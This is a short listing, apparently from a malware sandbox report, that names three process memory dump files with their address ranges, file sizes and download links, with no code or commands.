memory/4676-94-0x000001D559F90000-0x000001D559F98000-memory.dmp

Filesize
32KB

Download
memory/4700-12-0x00000194B8460000-0x00000194B8482000-memory.dmp

Filesize
136KB

Download
memory/4700-22-0x00000194B9260000-0x00000194B92B0000-memory.dmp

Filesize
320KB

Download